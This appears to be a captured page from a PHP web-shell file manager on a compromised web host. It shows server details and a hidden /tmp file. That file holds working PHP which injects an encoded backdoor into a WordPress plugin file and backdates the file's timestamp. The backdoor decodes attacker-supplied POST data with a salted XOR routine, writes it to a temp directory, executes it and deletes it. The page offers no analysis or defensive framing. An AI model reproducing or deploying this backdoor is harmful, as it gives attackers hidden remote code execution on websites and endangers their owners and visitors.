HEX
Server: Apache/2.4.6
System: Linux l2webhost 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User: theparlor (1016)
PHP: 7.3.33
Disabled: NONE
$ pwd: /tmp/
Upload Files
File: //tmp/.rindex
<?php   $p = "/home/theparlor/public_html/wp-content/plugins/everest-forms/src/dashboard/Router/dataLib.class.php"; $c = rawurldecode('%3C%3Fphp%0A%0Aif%28array_key_exists%28%22data%5Cx5Fchunk%22%2C%20%24_POST%29%29%7B%0A%09%24rec%20%3D%20array_filter%28%5B%22/tmp%22%2C%20%22/dev/shm%22%2C%20sys_get_temp_dir%28%29%2C%20getcwd%28%29%2C%20getenv%28%22TMP%22%29%2C%20ini_get%28%22upload_tmp_dir%22%29%2C%20%22/var/tmp%22%2C%20session_save_path%28%29%2C%20getenv%28%22TEMP%22%29%5D%29%3B%0A%09%24comp%20%3D%20%24_POST%5B%22data%5Cx5Fchunk%22%5D%3B%0A%09%24comp%20%09%3D%20%09%09explode%20%20%09%28%09%09%20%27.%27%09%2C%09%20%09%24comp%09%09%20%29%3B%09%20%20%0A%09%24itm%20%3D%20%27%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24salt2%20%3D%20%27abcdefghijklmnopqrstuvwxyz0123456789%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24sLen%20%3D%20strlen%28%24salt2%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24q%20%3D%200%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24__len%20%3D%20count%28%24comp%29%3B%0A%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20do%20%7B%09if%28%24q%3E%3D%09%24__len%29%20break%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24v6%20%3D%20%24comp%5B%24q%5D%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24chS%20%3D%20ord%28%24salt2%5B%24q%20%09%25%24sLen%5D%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24dec%20%3D%28%28int%29%24v6%20-%20%24chS%20-%28%24q%20%09%2510%29%29%5E%0988%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24itm%20.%3D%20chr%28%24dec%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24q%2B%2B%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%20while%28true%29%3B%0A%09foreach%20%28%24rec%20as%20%24tkn%29%3A%0A%20%20%20%20%09%09if%20%28%28is_dir%28%24tkn%29%20and%20is_writable%28%24tkn%29%29%29%20%7B%0A%20%20%20%20%24token%20%3D%20%22%24tkn/.sym%22%3B%0A%20%20%20%20%24success%20%3D%20file_put_contents%28%24token%2C%20%24itm%29%3B%0Aif%20%28%24success%29%20%7B%0A%09include%20%24token%3B%0A%09%40unlink%28%24token%29%3B%0A%09exit%3B%7D%0A%7D%0Aendforeach%3B%0A%7D'); if (file_put_contents($p, $c)) {     echo '!success!';     @touch($p, 1777979704); } die('!ended!');
@ Telegram